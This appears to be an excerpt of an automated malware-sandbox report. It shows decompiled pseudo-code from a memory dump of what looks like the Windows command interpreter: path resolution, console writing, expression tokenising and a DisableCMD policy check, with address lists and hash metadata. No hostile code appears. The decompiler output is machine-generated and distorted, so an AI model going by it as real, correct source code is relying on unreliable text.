								_t268 =  *_t339( *((intOrPtr*)(_t367 - 0x840)), _t170);
								__eflags = _t268;
								if(_t268 == 0) {
									goto L63;
								}
								goto L22;
							}
						}
					}
					L81:
					goto L69;
				}
				L26:
				 *( *(_t367 - 0x84c)) = (_t348 -  *((intOrPtr*)(_t367 - 0x844)) + 2 >> 1) - 1;
				__eflags = _t339;
				if(_t339 == 0) {
					L4:
					__eflags =  *( *(_t367 - 0x84c));
					_t174 = E4A553AFC;
					if( *( *(_t367 - 0x84c)) == 0) {
						L2:
						_t174 = _t339;
					} else {
					}
					goto L3;
				}
				__eflags =  *_t339;
				if( *_t339 == 0) {
					L1:
					if(_t339 == 0) {
						goto L4;
					}
					goto L2;
				}
				__eflags =  *(_t367 - 0x828) & 0x0000c000;
				if(( *(_t367 - 0x828) & 0x0000c000) == 0) {
					_push(_t339);
					L49:
					_t339 = E4A5519D6();
					goto L1;
				}
				 *(_t367 - 0x824) = 0;
				__eflags =  *(_t367 - 0x838);
				if( *(_t367 - 0x838) != 0) {
					__eflags =  *(_t367 - 0x838) - 0xffffffff;
					if( *(_t367 - 0x838) == 0xffffffff) {
						L91:
						_t339 = 0;
						goto L31;
					}
					_t256 = SearchPathW( *(_t367 - 0x838), _t339, 0, 0x208, _t367 - 0x824, _t367 - 0x82c);
					 *(_t367 - 0x850) = _t256;
					__eflags = _t256;
					if(_t256 == 0) {
						goto L91;
					}
					__eflags =  *(_t367 - 0x828);
					if( *(_t367 - 0x828) == 0) {
						 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00008001;
					}
					goto L31;
				} else {
					 *(_t367 - 0x850) = GetFullPathNameW(_t339, 0x208, _t367 - 0x824, _t367 - 0x82c);
					L31:
					 *(_t367 - 0x834) =  *(_t367 - 0x828) & 0x00000020;
					E4A556E47(_t367 - 0x824, 0x208,  *(_t367 - 0x828) & 0x00000020);
					_t188 = wcsrchr(_t367 - 0x824, 0x5c);
					 *(_t367 - 0x82c) = _t188;
					__eflags = _t188;
					if(_t188 == 0) {
						 *(_t367 - 0x82c) = wcsrchr(_t367 - 0x824, _t188);
					} else {
						_t29 = _t367 - 0x82c;
						 *_t29 =  &(( *(_t367 - 0x82c))[0]);
						__eflags =  *_t29;
					}
					__eflags =  *(_t367 - 0x850);
					if( *(_t367 - 0x850) == 0) {
						goto L1;
					} else {
						 *(_t367 - 0x414) = 0;
						memset(_t367 - 0x412, 0, 0x40e);
						_t195 =  *(_t367 - 0x828) & 0x00004000;
						__eflags = _t195;
						_t357 = _t367 - 0x414;
						 *(_t367 - 0x83c) = _t195;
						_t341 = 0x207;
						if(_t195 != 0) {
							_t198 = GetFileAttributesExW(_t367 - 0x824, 0, _t367 - 0x878);
							__eflags = _t198;
							if(_t198 == 0) {
								goto L35;
							}
							__eflags =  *(_t367 - 0x828) & 0x00000100;
							if(( *(_t367 - 0x828) & 0x00000100) == 0) {
								L102:
								__eflags =  *(_t367 - 0x828) & 0x00000200;
								if(( *(_t367 - 0x828) & 0x00000200) != 0) {
									E4A562513(_t367 - 0x864, _t367 - 0x89c);
									__eflags = _t357 - _t367 - 0x414;
									if(_t357 != _t367 - 0x414) {
										__eflags = _t357 - _t367 - 0x414 >> 1 - _t341;
										if(_t357 - _t367 - 0x414 >> 1 < _t341) {
											_t252 = 0x20;
											 *_t357 = _t252;
											_t357 = _t357 + 2;
											__eflags = _t357;
										}
									}
									_t360 = _t357 + E4A56270D(_t367 - 0x89c, 0, _t357, 0x104 - (_t357 - _t367 - 0x414 >> 1)) * 2;
									__eflags = _t360 - _t367 - 0x414;
									if(_t360 != _t367 - 0x414) {
										__eflags = _t360 - _t367 - 0x414 >> 1 - 0x207;
										if(_t360 - _t367 - 0x414 >> 1 < 0x207) {
											_t248 = 0x20;
											 *_t360 = _t248;
											_t360 = _t360 + 2;
											__eflags = _t360;
										}
									}
									__eflags = 0x104 - (_t360 - _t367 - 0x414 >> 1);
									_t357 = _t360 + E4A55D701(_t360, _t367 - 0x89c, 0, _t360, 0x104 - (_t360 - _t367 - 0x414 >> 1)) * 2;
									_t341 = 0x207;
								}
								__eflags =  *(_t367 - 0x828) & 0x00000400;
								if(( *(_t367 - 0x828) & 0x00000400) != 0) {
									__eflags = _t357 - _t367 - 0x414;
									if(_t357 != _t367 - 0x414) {
										__eflags = _t357 - _t367 - 0x414 >> 1 - _t341;
										if(_t357 - _t367 - 0x414 >> 1 < _t341) {
											_t229 = 0x20;
											 *_t357 = _t229;
											_t357 = _t357 + 2;
											__eflags = _t357;
										}
									}
									 *((intOrPtr*)(_t367 - 0x854)) =  *((intOrPtr*)(_t367 - 0x858));
									 *(_t367 - 0x850) =  *(_t367 - 0x85c);
									_t357 = _t357 + E4A56292F(0, _t367 - 0x854, 0, _t357, 0x208 - (_t357 - _t367 - 0x414 >> 1)) * 2;
								}
								goto L35;
							}
							_t332 = 0;
							__eflags =  *0x4a59088c - _t332; // 0x64
							if(__eflags == 0) {
								goto L102;
							}
							_t253 = 0x4a59088c;
							while(1) {
								_t334 = _t332 >> 1;
								__eflags = _t332 >> 1 - _t341;
								if(_t332 >> 1 >= _t341) {
									goto L102;
								}
								_t336 =  *(_t367 - 0x878);
								__eflags =  *(_t253 - 4) & _t336;
								if(( *(_t253 - 4) & _t336) == 0) {
									_t334 = 0x2d;
								} else {
									_t334 =  *_t253;
								}
								 *_t357 = _t334;
								_t357 = _t357 + 2;
								_t253 = _t253 + 8;
								_t332 = _t332 + 2;
								__eflags =  *_t253;
								if( *_t253 != 0) {
									continue;
								} else {
									goto L102;
								}
							}
							goto L102;
						}
						L35:
						_t199 =  *(_t367 - 0x828);
						__eflags = _t199 & 0x00008000;
						if((_t199 & 0x00008000) == 0) {
							__eflags =  *(_t367 - 0x83c);
							if( *(_t367 - 0x83c) == 0) {
								goto L36;
							}
							L48:
							_push(_t367 - 0x414);
							goto L49;
						}
						L36:
						__eflags = _t357 - _t367 - 0x414;
						if(_t357 != _t367 - 0x414) {
							_t334 = _t367 - 0x414;
							__eflags = _t357 - _t367 - 0x414 >> 1 - _t341;
							if(_t357 - _t367 - 0x414 >> 1 < _t341) {
								_t321 = 0x20;
								 *_t357 = _t321;
								_t357 = _t357 + 2;
							}
						}
						__eflags = _t199 & 0x00000001;
						if((_t199 & 0x00000001) != 0) {
							L47:
							__eflags = 0x208 - (_t357 - _t367 - 0x414 >> 1);
							E4A55185A(_t357, 0x208 - (_t357 - _t367 - 0x414 >> 1), _t367 - 0x824);
							goto L48;
						} else {
							__eflags =  *(_t367 - 0x834);
							if( *(_t367 - 0x834) != 0) {
								__eflags = _t199 & 0x0000001e;
								if((_t199 & 0x0000001e) != 0) {
									goto L39;
								}
								goto L47;
							}
							L39:
							_t342 = _t367 - 0x820;
							__eflags = _t199 & 0x00000002;
							if((_t199 & 0x00000002) == 0) {
								E4A55185A(_t367 - 0x824, 0x208, _t342);
								_t48 = _t367 - 0x82c;
								 *_t48 =  *(_t367 - 0x82c) - 4;
								__eflags =  *_t48;
								_t342 = _t367 - 0x824;
							}
							__eflags =  *(_t367 - 0x828) & 0x00000004;
							if(( *(_t367 - 0x828) & 0x00000004) == 0) {
								__eflags = 0x208 - (_t342 - _t367 - 0x824 >> 1);
								E4A55185A(_t342, 0x208 - (_t342 - _t367 - 0x824 >> 1),  *(_t367 - 0x82c));
								 *(_t367 - 0x82c) = _t342;
							}
							_t206 = wcsrchr( *(_t367 - 0x82c), 0x2e);
							__eflags = _t206;
							if(_t206 == 0) {
								 *(_t367 - 0x83c) =  *(_t367 - 0x83c) & _t206;
								_t206 = _t367 - 0x83c;
							}
							__eflags =  *(_t367 - 0x828) & 0x00000010;
							if(( *(_t367 - 0x828) & 0x00000010) == 0) {
								__eflags = 0;
								 *_t206 = 0;
							}
							__eflags =  *(_t367 - 0x828) & 0x00000008;
							if(( *(_t367 - 0x828) & 0x00000008) == 0) {
								E4A55185A( *(_t367 - 0x82c), 0x208 - ( *(_t367 - 0x82c) - _t367 - 0x824 >> 1), _t206);
							}
							goto L47;
						}
					}
				}
			}













































                                0x4a556c46
                                0x4a556c46
                                0x4a556c46
                                0x4a556c46
                                0x4a556c46
                                0x4a556c46
                                0x4a556c4f
                                0x4a556c53
                                0x00000000
                                0x4a556c59
                                0x4a556c5a
                                0x4a556c5f
                                0x4a556c63
                                0x4a556c69
                                0x4a556c6b
                                0x4a556c6b
                                0x00000000
                                0x4a556c63
                                0x4a566c49
                                0x4a566c49
                                0x4a566c49
                                0x4a566c50
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a566c6c
                                0x4a566c6c
                                0x4a566bc8
                                0x4a566bce
                                0x4a566bce
                                0x4a566bce
                                0x4a55767e
                                0x4a55767e
                                0x4a55767f
                                0x4a557680
                                0x4a557683
                                0x4a557686
                                0x00000000
                                0x00000000
                                0x4a557607
                                0x4a557607
                                0x4a55760b
                                0x00000000
                                0x00000000
                                0x4a55760d
                                0x4a557619
                                0x4a55761b
                                0x4a55761e
                                0x4a557620
                                0x00000000
                                0x00000000
                                0x4a557622
                                0x4a55762c
                                0x4a557630
                                0x4a557632
                                0x4a55fd36
                                0x4a55fd3c
                                0x4a55fd3c
                                0x4a55763e
                                0x4a557641
                                0x4a557644
                                0x4a557645
                                0x4a55fcf1
                                0x4a55fcf1
                                0x4a55fcf1
                                0x4a55fcf4
                                0x4a566c03
                                0x4a566c03
                                0x00000000
                                0x4a566c03
                                0x4a55fcfa
                                0x4a55fcfa
                                0x4a55fcfa
                                0x4a55fcfb
                                0x4a566bf4
                                0x4a566bf4
                                0x00000000
                                0x4a566bf4
                                0x4a55fd01
                                0x4a55fd01
                                0x4a55fd01
                                0x4a55fd04
                                0x4a566bdd
                                0x4a566bde
                                0x4a566bdf
                                0x00000000
                                0x00000000
                                0x4a566be5
                                0x4a566be5
                                0x00000000
                                0x4a566be5
                                0x4a55fd0a
                                0x4a55fd0a
                                0x00000000
                                0x4a55764b
                                0x4a55764b
                                0x4a55764b
                                0x4a557990
                                0x4a557990
                                0x00000000
                                0x4a557990
                                0x4a557651
                                0x4a557651
                                0x4a557651
                                0x4a557654
                                0x4a566bce
                                0x4a566bce
                                0x00000000
                                0x4a566bd8
                                0x4a55765a
                                0x4a55765a
                                0x4a55765a
                                0x4a55765d
                                0x4a557981
                                0x4a557981
                                0x00000000
                                0x4a557981
                                0x4a557663
                                0x4a557664
                                0x4a557664
                                0x4a557665
                                0x4a55fd47
                                0x4a55fd47
                                0x00000000
                                0x4a55fd47
                                0x4a55766b
                                0x4a55766b
                                0x4a55766e
                                0x4a562374
                                0x4a562374
                                0x4a56237b
                                0x4a562382
                                0x4a562382
                                0x4a5551bc
                                0x4a5551bf
                                0x4a5551c0
                                0x4a5551c3
                                0x4a5551ca
                                0x4a5551ca
                                0x4a56237d
                                0x4a566c64
                                0x4a566c69
                                0x4a566c6c
                                0x4a566bc8
                                0x00000000
                                0x4a557674
                                0x4a557674
                                0x4a557674
                                0x4a557674
                                0x00000000
                                0x4a557674
                                0x4a55766e
                                0x4a557645
                                0x4a55768c
                                0x4a55768c
                                0x4a55768f
                                0x4a557696
                                0x4a557699
                                0x4a55fd19
                                0x4a55fd1f
                                0x4a55fd25
                                0x4a5576bc
                                0x4a5576c6
                                0x4a5576c9
                                0x4a5576ca
                                0x4a5576cc
                                0x00000000
                                0x00000000
                                0x4a5576d2
                                0x4a5576e0
                                0x4a5576e8
                                0x4a5576ea
                                0x00000000
                                0x00000000
                                0x4a5576ec
                                0x4a5576ec
                                0x4a5576f0
                                0x00000000
                                0x00000000
                                0x4a5576f6
                                0x4a5576f6
                                0x4a5576fa
                                0x4a557922
                                0x4a557927
                                0x4a557929
                                0x4a55792f
                                0x4a557935
                                0x4a55793b
                                0x4a557942
                                0x4a557948
                                0x4a55794e
                                0x4a557954
                                0x4a557954
                                0x4a55794e
                                0x4a557942
                                0x4a557935
                                0x4a557929
                                0x00000000
                                0x4a5576fa
                                0x4a55769f
                                0x4a55769f
                                0x4a5576a3
                                0x4a566c12
                                0x4a566c13
                                0x4a566c17
                                0x4a566c23
                                0x4a566c26
                                0x4a566c27
                                0x4a566c29
                                0x00000000
                                0x00000000
                                0x4a566c2f
                                0x4a566c39
                                0x4a566c43
                                0x4a566c45
                                0x4a566c47
                                0x4a566c79
                                0x4a566c85
                                0x4a566c91
                                0x4a566c97
                                0x4a566c9c
                                0x4a566ca3
                                0x4a566ca5
                                0x4a566ca5
                                0x4a566ca5
                                0x4a566ca5
                                0x4a566cac
                                0x4a566cb3
                                0x4a566cb4
                                0x00000000
                                0x4a566cb4
                                0x00000000
                                0x4a566c47
                                0x4a5576a9
                                0x4a5576b0
                                0x4a5576b4
                                0x4a5576b6
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a5576b6
                                0x4a566bce
                                0x4a566c6c
                                0x4a566c52
                                0x00000000
                                0x4a566c52
                                0x4a557700
                                0x4a557711
                                0x4a557713
                                0x4a557715
                                0x4a555273
                                0x4a555279
                                0x4a55527c
                                0x4a555281
                                0x4a5551ba
                                0x4a5551ba
                                0x00000000
                                0x4a555287
                                0x00000000
                                0x4a555281
                                0x4a55771b
                                0x4a55771f
                                0x4a5551b2
                                0x4a5551b4
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a5551b4
                                0x4a557725
                                0x4a55772b
                                0x4a55f3dc
                                0x4a5578d6
                                0x4a5578db
                                0x00000000
                                0x4a5578db
                                0x4a557733
                                0x4a55773f
                                0x4a557745
                                0x4a566cc3
                                0x4a566cca
                                0x4a566d10
                                0x4a566d10
                                0x00000000
                                0x4a566d10
                                0x4a566ce4
                                0x4a566cea
                                0x4a566cf0
                                0x4a566cf2
                                0x00000000
                                0x00000000
                                0x4a566cf4
                                0x4a566cfb
                                0x4a566d01
                                0x4a566d01
                                0x00000000
                                0x4a55774b
                                0x4a557761
                                0x4a557767
                                0x4a557771
                                0x4a55777f
                                0x4a557793
                                0x4a557797
                                0x4a55779d
                                0x4a55779f
                                0x4a566d23
                                0x4a5577a5
                                0x4a5577a5
                                0x4a5577a5
                                0x4a5577a5
                                0x4a5577a5
                                0x4a5577ac
                                0x4a5577b3
                                0x00000000
                                0x4a5577b9
                                0x4a5577c1
                                0x4a5577cf
                                0x4a5577dd
                                0x4a5577dd
                                0x4a5577e2
                                0x4a5577e8
                                0x4a5577ee
                                0x4a5577f3
                                0x4a566d3e
                                0x4a566d44
                                0x4a566d46
                                0x00000000
                                0x00000000
                                0x4a566d4c
                                0x4a566d56
                                0x4a566d93
                                0x4a566d93
                                0x4a566d9d
                                0x4a566db1
                                0x4a566dbc
                                0x4a566dbe
                                0x4a566dcc
                                0x4a566dce
                                0x4a566dd2
                                0x4a566dd3
                                0x4a566dd7
                                0x4a566dd7
                                0x4a566dd7
                                0x4a566dce
                                0x4a566dfd
                                0x4a566e06
                                0x4a566e08
                                0x4a566e16
                                0x4a566e1b
                                0x4a566e1f
                                0x4a566e20
                                0x4a566e24
                                0x4a566e24
                                0x4a566e24
                                0x4a566e1b
                                0x4a566e31
                                0x4a566e43
                                0x4a566e46
                                0x4a566e46
                                0x4a566e4b
                                0x4a566e55
                                0x4a566e61
                                0x4a566e63
                                0x4a566e71
                                0x4a566e73
                                0x4a566e77
                                0x4a566e78
                                0x4a566e7c
                                0x4a566e7c
                                0x4a566e7c
                                0x4a566e73
                                0x4a566e83
                                0x4a566e8f
                                0x4a566eb7
                                0x4a566eb7
                                0x00000000
                                0x4a566e55
                                0x4a566d58
                                0x4a566d5a
                                0x4a566d61
                                0x00000000
                                0x00000000
                                0x4a566d63
                                0x4a566d68
                                0x4a566d6a
                                0x4a566d6c
                                0x4a566d6e
                                0x00000000
                                0x00000000
                                0x4a566d70
                                0x4a566d76
                                0x4a566d79
                                0x4a566d82
                                0x4a566d7b
                                0x4a566d7b
                                0x4a566d7b
                                0x4a566d83
                                0x4a566d87
                                0x4a566d89
                                0x4a566d8c
                                0x4a566d8d
                                0x4a566d91
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a566d91
                                0x00000000
                                0x4a566d68
                                0x4a5577f9
                                0x4a5577f9
                                0x4a5577ff
                                0x4a557804
                                0x4a566ebf
                                0x4a566ec6
                                0x00000000
                                0x00000000
                                0x4a5578cf
                                0x4a5578d5
                                0x00000000
                                0x4a5578d5
                                0x4a55780a
                                0x4a557810
                                0x4a557812
                                0x4a566ed3
                                0x4a566edd
                                0x4a566edf
                                0x4a566ee7
                                0x4a566ee8
                                0x4a566eec
                                0x4a566eec
                                0x4a566edf
                                0x4a557818
                                0x4a55781a
                                0x4a5578b3
                                0x4a5578c6
                                0x4a5578ca
                                0x00000000
                                0x4a557820
                                0x4a557820
                                0x4a557827
                                0x4a562389
                                0x4a56238b
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a562391
                                0x4a55782d
                                0x4a55782d
                                0x4a557833
                                0x4a557835
                                0x4a557842
                                0x4a557847
                                0x4a557847
                                0x4a557847
                                0x4a55784e
                                0x4a55784e
                                0x4a557854
                                0x4a55785b
                                0x4a557871
                                0x4a557875
                                0x4a55787a
                                0x4a55787a
                                0x4a557888
                                0x4a557890
                                0x4a557892
                                0x4a55fea7
                                0x4a55fead
                                0x4a55fead
                                0x4a557898
                                0x4a55789f
                                0x4a5578a1
                                0x4a5578a3
                                0x4a5578a3
                                0x4a5578a6
                                0x4a5578ad
                                0x4a557977
                                0x4a557977
                                0x00000000
                                0x4a5578ad
                                0x4a55781a
                                0x4a5577b3

                                APIs
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: wcsrchr$FullNamePathmemset
                                • String ID:
                                • API String ID: 1865318540-0
                                • Opcode ID: 22e65fac5895f01413085392768d8b4e361da38305df70c9c6f5c170ffbb5986
                                • Instruction ID: 77ac82e3bb06ce93142d77faecb6396c6b48be0bc7639050fcb4d079f83a3b9c
                                • Opcode Fuzzy Hash: 22e65fac5895f01413085392768d8b4e361da38305df70c9c6f5c170ffbb5986
                                • Instruction Fuzzy Hash: 6ED184B1910129ABDB299A24CE44BED7BF8FF44310F0185EAD589E6188DF719E84CFD4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55453E, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 92fileCOMMON
                                Download Yara Rule
                                C-Code - Quality: 79%
                                			E4A55453E(void* __eax, void* _a4, short* _a8, long _a12, DWORD* _a16) {
				long _v8;
				long _v12;
				int _t27;
				long _t29;
				int _t34;
				void* _t36;
				DWORD* _t39;
				void* _t40;
				void* _t46;
				long _t47;
				long _t51;
				intOrPtr _t52;

				_t47 = _a12;
				_v12 = _t47;
				__imp___get_osfhandle(_a4, _t46, _t36, _t40, _t40);
				_a4 = __eax;
				_t52 =  *0x4a590668; // 0x0
				if(_t52 != 0) {
					_t27 = WriteFile(__eax, _a8, _t47, _a16, 0);
				} else {
					while(_a12 > 0x2000) {
						_t29 = WideCharToMultiByte( *0x4a5741b8, 0, _a8, 0x1000, 0x4a576640, 0x2000, 0, 0);
						_a8 =  &(_a8[0x1000]);
						_a12 = _a12 - 0x2000;
						_v8 = _t29;
						if(WriteFile(_a4, 0x4a576640, _t29, _a16, 0) == 0) {
							L10:
							_t27 = 0;
							L7:
							goto L8;
						} else {
							if( *_a16 == _v8) {
								continue;
							} else {
								goto L10;
							}
						}
						L15:
					}
					if(_a12 == 0) {
						_t39 = _a16;
						goto L6;
					} else {
						_t34 = WideCharToMultiByte( *0x4a5741b8, 0, _a8, 0xffffffff, 0x4a576640, 0x2000, 0, 0);
						_t39 = _a16;
						_t51 = _t34 - 1;
						if(WriteFile(_a4, 0x4a576640, _t51, _t39, 0) == 0 ||  *_t39 != _t51) {
							goto L10;
						} else {
							L6:
							 *_t39 = _v12;
							_t27 = 1;
						}
					}
					goto L7;
				}
				L8:
				return _t27;
				goto L15;
			}















                                0x4a554547
                                0x4a55454d
                                0x4a554550
                                0x4a554559
                                0x4a55455c
                                0x4a554562
                                0x4a5686c2
                                0x4a554568
                                0x4a554579
                                0x4a5686e0
                                0x4a5686e6
                                0x4a5686e9
                                0x4a5686f0
                                0x4a568700
                                0x4a5625e7
                                0x4a5625e7
                                0x4a5545cc
                                0x00000000
                                0x4a568706
                                0x4a56870e
                                0x00000000
                                0x4a568714
                                0x00000000
                                0x4a568714
                                0x4a56870e
                                0x00000000
                                0x4a568700
                                0x4a554585
                                0x4a5625df
                                0x00000000
                                0x4a55458b
                                0x4a55459b
                                0x4a5545a2
                                0x4a5545a8
                                0x4a5545b6
                                0x00000000
                                0x4a5545c4
                                0x4a5545c4
                                0x4a5545c7
                                0x4a5545cb
                                0x4a5545cb
                                0x4a5545b6
                                0x00000000
                                0x4a554585
                                0x4a5545cd
                                0x4a5545d0
                                0x00000000

                                APIs
                                • _get_osfhandle.MSVCRT ref: 4A554550
                                • WideCharToMultiByte.KERNEL32(00000000,?,000000FF,4A576640,00002000,00000000,00000000,00000001,?,?,4A55596D,00000001,?,?,?,00000001), ref: 4A55459B
                                • WriteFile.KERNEL32(?,4A576640,-00000001,4A564FE5,00000000), ref: 4A5545AE
                                • WriteFile.KERNEL32(00000000,?,?,4A564FE5,00000000), ref: 4A5686C2
                                • WideCharToMultiByte.KERNEL32(00000000,?,00001000,4A576640,00002000,00000000,00000000,00000001,?,?,4A55596D,00000001,?,?,?,00000001), ref: 4A5686E0
                                • WriteFile.KERNEL32(?,4A576640,00000000,4A564FE5,00000000), ref: 4A5686F8
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                • String ID: @fWJ
                                • API String ID: 3249344982-2516145070
                                • Opcode ID: 37206345afab32e2a7a72599cfaec6872503aa6880b984d8269a0219abf95087
                                • Instruction ID: 08859b9ec10fb2fb42ed474dd334a59b68b85ed2f412120f506329d4381338e9
                                • Opcode Fuzzy Hash: 37206345afab32e2a7a72599cfaec6872503aa6880b984d8269a0219abf95087
                                • Instruction Fuzzy Hash: 68314BB1501259BFEB21AF62DE88D9B3FBDEF557A8B014126F809DA564D3308E50CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55F176, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 73COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E4A55F176(signed short** _a4, signed short** _a8, signed short** _a12) {
				long _t15;
				long _t20;
				wchar_t* _t21;
				signed short** _t33;

				_t33 = _a4;
				_t20 = E4A55F123(_t33) & 0x0000ffff;
				if(_t20 == 0 || iswdigit(_t20) != 0 || wcschr(L"<>+-*/%()|^&=,", _t20) != 0) {
					L12:
					return 0;
				} else {
					_t21 = L"+-~!";
					if(wcschr(_t21, _t20) != 0) {
						goto L12;
					}
					 *_a8 =  *_t33;
					while( *( *_t33) != 0) {
						_t15 =  *( *_t33) & 0x0000ffff;
						if(_t15 <= 0x20 || wcschr(_t21, _t15) != 0 || wcschr(L"<>+-*/%()|^&=,",  *( *_t33) & 0x0000ffff) != 0) {
							break;
						} else {
							 *_t33 =  &(( *_t33)[1]);
							continue;
						}
					}
					 *_a12 =  *_t33;
					return 1;
				}
			}







                                0x4a55f17e
                                0x4a55f187
                                0x4a55f18d
                                0x4a55f20b
                                0x00000000
                                0x4a55f1af
                                0x4a55f1b0
                                0x4a55f1bc
                                0x00000000
                                0x00000000
                                0x4a55f1c3
                                0x4a55f1c5
                                0x4a55f1cf
                                0x4a55f1d6
                                0x00000000
                                0x4a55f1f5
                                0x4a55f1f5
                                0x00000000
                                0x4a55f1f5
                                0x4a55f1d6
                                0x4a55f1ff
                                0x00000000
                                0x4a55f203

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: wcschr$iswdigit
                                • String ID: +-~!$<>+-*/%()|^&=,
                                • API String ID: 2770779731-632268628
                                • Opcode ID: 635fded20df36a0386bf5594b2ffe55327d22a5ae7f99a74b2cb310f90ff3025
                                • Instruction ID: b90e8a5d534b0f64d4b026e747c1a973e76d2339b098e9ce868e93550a0bcc78
                                • Opcode Fuzzy Hash: 635fded20df36a0386bf5594b2ffe55327d22a5ae7f99a74b2cb310f90ff3025
                                • Instruction Fuzzy Hash: 6511A0BBA05207ABA3049B69DD90D667BECFF453B53200427F912C71C8EB34E8058B60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A557B0D, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 32registryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E4A557B0D(void* __ecx, void* _a4) {
				int _v8;
				char _v12;
				long _t9;
				char* _t15;

				_t1 =  &_a4; // 0x4a55734a
				_t15 =  *_t1;
				 *_t15 =  *_t15 & 0x00000000;
				_t2 =  &_a4; // 0x4a55734a
				_t9 = RegOpenKeyExW(0x80000001, L"Software\\Policies\\Microsoft\\Windows\\System", 0, 0x20019, _t2);
				if(_t9 == 0) {
					_t4 =  &_v12; // 0x4a55734a
					_t5 =  &_a4; // 0x4a55734a
					_v8 = 4;
					RegQueryValueExW( *_t5, L"DisableCMD", 0, _t4, _t15,  &_v8);
					_t9 = RegCloseKey(_a4);
				}
				return _t9;
			}







                                0x4a557b15
                                0x4a557b15
                                0x4a557b18
                                0x4a557b1b
                                0x4a557b30
                                0x4a557b38
                                0x4a557b3f
                                0x4a557b4a
                                0x4a557b4d
                                0x4a557b54
                                0x4a557b5d
                                0x4a557b5d
                                0x4a557b65

                                APIs
                                • RegOpenKeyExW.KERNEL32 ref: 4A557B30
                                • RegQueryValueExW.KERNEL32(JsUJ,DisableCMD,00000000,JsUJ,JsUJ,?), ref: 4A557B54
                                • RegCloseKey.KERNEL32(?), ref: 4A557B5D
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID: DisableCMD$JsUJ$JsUJ$Software\Policies\Microsoft\Windows\System
                                • API String ID: 3677997916-534508341
                                • Opcode ID: e61de6fd4385c74c161e368ac5acb8372be4f06d8f15e282af9d2e307d16dbf2
                                • Instruction ID: 65ef334fd20419664982201ba8c623ecbfa2e5b8d2a6ae953b4e4e4184bc9534
                                • Opcode Fuzzy Hash: e61de6fd4385c74c161e368ac5acb8372be4f06d8f15e282af9d2e307d16dbf2
                                • Instruction Fuzzy Hash: 61F0FEB6501208BFEB00AF80DD05FEA7FBCEB45755F114056FA45E6558E7B0AA40CBA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A55829A, Relevance: 12.1, APIs: 8, Instructions: 107COMMON
                                Download Yara Rule
                                C-Code - Quality: 62%
                                			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				long _v8;
				intOrPtr* _v24;
				long _v32;
				intOrPtr _v36;
				long _t12;
				intOrPtr _t13;
				intOrPtr _t14;
				intOrPtr _t15;
				int _t16;
				int _t17;
				intOrPtr* _t19;
				intOrPtr _t22;
				void* _t23;
				void* _t26;
				intOrPtr _t28;
				long _t38;
				intOrPtr _t40;
				void* _t42;
				intOrPtr _t55;
				intOrPtr _t56;

				0x9eb6d(_t42);
				E4A55264A(__ebx, __edi, __esi);
				_v8 = 0;
				_t38 =  *( *[fs:0x18] + 4);
				_v32 = 0;
				while(1) {
					_t12 = InterlockedCompareExchange(0x4a574204, _t38, 0);
					if(_t12 == 0) {
						break;
					}
					__eflags = _t12 - _t38;
					if(__eflags != 0) {
						Sleep(0x3e8);
						continue;
					} else {
						_t40 = 1;
						_v32 = 1;
					}
					L3:
					_t13 =  *0x4a574200; // 0x0
					if(_t13 == _t40) {
						L4A572309();
						_t26 = 0x1f;
						goto L6;
					} else {
						_t22 =  *0x4a574200; // 0x0
						if(_t22 != 0) {
							 *0x4a59090c = _t40;
							goto L6;
						} else {
							 *0x4a574200 = _t40;
							_t23 = E4A558271(0x4a558378, 0x4a558384);
							_pop(_t26);
							if(_t23 != 0) {
								_v8 = 0xfffffffe;
								_t17 = 0xff;
								goto L25;
							} else {
								L6:
								_t14 =  *0x4a574200; // 0x0
								if(_t14 == _t40) {
									_push(0x4a558374);
									L4A557C76();
									_t26 = 0x4a55836c;
									 *0x4a574200 = 2;
								}
								if(_v32 == 0) {
									InterlockedExchange(0x4a574204, 0);
								}
								_t55 =  *0x4a590688; // 0x0
								if(_t55 != 0) {
									_t15 = E4A57227C(0, 0x4a574204, _t40, __eflags);
									_t26 = 0x4a590688;
									__eflags = _t15;
									if(_t15 != 0) {
										 *0x4a590688(0, 2, 0);
									}
								}
								_push( *0x4a57423c);
								_push( *0x4a574240);
								_push( *0x4a574238);
								_t16 = L4A557308(_t26, 0x4a574204, _t40);
								 *0x4a574274 = _t16;
								_t56 =  *0x4a574138; // 0x0
								if(_t56 != 0) {
									__eflags =  *0x4a59090c; // 0x0
									if(__eflags == 0) {
										__imp___cexit();
									}
									_v8 = 0xfffffffe;
									_t17 =  *0x4a574274; // 0x0
									L25:
									return E4A5513B6(_t17);
								} else {
									exit(_t16);
									_t19 = _v24;
